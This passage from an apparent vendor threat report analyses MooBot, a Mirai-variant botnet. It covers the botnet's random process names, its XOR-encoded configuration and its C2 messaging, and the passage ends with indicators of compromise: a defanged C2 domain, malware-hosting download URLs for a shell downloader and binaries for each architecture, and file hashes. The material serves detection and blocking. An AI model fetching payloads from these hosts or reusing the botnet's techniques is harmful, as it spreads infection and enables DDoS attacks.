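MOOBOT_ALPHABET = "w5q6he3dbrsgmclkiu4to18npavj702f"


def random_name(length: int, rng: random.Random) -> str:
    """Pick `length` characters from the embedded alphabet."""
    return "".join(rng.choice(MOOBOT_ALPHABET) for _ in range(length))


rng = random.Random(1234)  # fixed seed so the illustration is repeatable
print(random_name(12, rng))
```

The string consists of 32 distinct characters and omits x, y, z and 9, so names generated from it never contain those characters.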

Upon execution, the binary file prints get haxored! to the console, spawns processes with random names and wipes out the executable file.

The screenshot shows examples of MooBot spawning processes with random names.
Figure 7. MooBot creates processes.

As a variant, MooBot inherits Mirai’s most significant feature – a data section with embedded default login credentials and botnet configuration – but instead of using Mirai’s encryption key, 0xDEADBEEF, MooBot encrypts its data with 0x22.

Red arrows highlight the decoded username and the decoded password.
Figure 8. MooBot configuration decode function.
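Decoding data protected with the 0x22 key can be sketched as a byte-wise XOR. This is an illustration under assumptions: it treats the scheme as a single-byte XOR applied to every byte, and the string admin is only a stand-in and was not taken from the sample.

```python
MOOBOT_KEY = 0x22


def xor_bytes(data: bytes, key: int = MOOBOT_KEY) -> bytes:
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


encoded = xor_bytes(b"admin")  # stand-in for an embedded, encoded credential
print(encoded)                 # b'CFOKL'
print(xor_bytes(encoded))      # b'admin'
```

Because XOR is its own inverse, the same function serves for both encoding and decoding.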

After decoding its C2 server vpn.komaru[.]today from configuration, MooBot will send out a message to inform the C2 server that a new MooBot is online. The message starts with the hardcoded magic value 0x336699.

At the time of our analysis, the C2 server was offline. According to the code analysis, MooBot will also send heartbeat messages to the C2 server and parse commands from C2 to start a DDoS attack on a specific IP address and port number.

Conclusion

The vulnerabilities mentioned above have low attack complexity but critical security impact, since they can lead to remote code execution. Once attackers gain control in this manner, they can add the newly compromised devices to their botnet and use them to conduct further attacks such as DDoS.

Therefore, we strongly recommend applying patches and upgrades when possible.

Palo Alto Networks customers receive protections from the vulnerability and malware through the following products and services:

  • Next-Generation Firewalls with a Threat Prevention security subscription can block the attacks with Best Practices via Threat Prevention signatures 38600, 92960, 92959 and 92533.
  • WildFire can stop the malware with static signature detections.
  • The Palo Alto Networks IoT security platform can leverage network traffic information to identify the vendor, model and firmware version of a device and identify specific devices that are vulnerable to the aforementioned CVEs.
  • Advanced URL Filtering and DNS Security are able to block the C2 domain and malware hosting URLs.
  • In addition, IoT Security has an inbuilt machine learning-based anomaly detection that can alert the customer if a device exhibits non-typical behavior, such as a sudden appearance of traffic from a new source, an unusually high number of connections or an inexplicable surge of certain attributes typically appearing in IoT application payloads.

Indicators of Compromise

Infrastructure

MooBot C2

vpn.komaru[.]today

Malware Host

http://159.203.15[.]179/wget.sh
http://159.203.15[.]179/wget.sh3
http://159.203.15[.]179/mips
http://159.203.15[.]179/mipsel
http://159.203.15[.]179/arm
http://159.203.15[.]179/arm5
http://159.203.15[.]179/arm6
http://159.203.15[.]179/arm7
http://159.203.15[.]179/sh4
http://159.203.15[.]179/arc
http://159.203.15[.]179/sparc
http://159.203.15[.]179/x86_64
http://159.203.15[.]179/i686
http://159.203.15[.]179/i586
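The indicators above are written in defanged form, with [.] in place of a dot, so that they cannot be followed by accident. Before loading them into a blocklist or search query, they need to be converted back. The following is a minimal sketch with a hypothetical function name. It handles only the [.] and hxxp conventions that appear in this document.

```python
def refang(indicator: str) -> str:
    """Convert a defanged indicator back to its machine-readable form."""
    restored = indicator.strip().replace("[.]", ".")
    if restored.startswith("hxxp"):
        restored = "http" + restored[len("hxxp"):]
    return restored


defanged_indicators = [
    "vpn.komaru[.]today",
    "http://159.203.15[.]179/mips",
]
blocklist = [refang(item) for item in defanged_indicators]
print(len(blocklist), "indicators prepared for import")
```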

Artifacts

Shell Script Downloader

Filename SHA256
rt B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1
wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075

Table 3. Shell script downloader.

MooBot Sample

Filename SHA256
arc 36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A
arm 88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08
arm5 D7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB
arm6 72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258
arm7 7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616
i586 CC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6
i686 188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B
mips 4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2
mipsel 06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4
sh4 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871
x86_64 3B12ABA8C92A15EF2A917F7C03A5216342E7D2626B025523C62308FC799B0737

Table 4. MooBot samples.

Additional Resources

New Mirai Variant Targeting Network Security Devices - Unit 42, Palo Alto Networks
Network Attack Trends: Internet of Threats (November 2020-January 2021) - Unit 42, Palo Alto Networks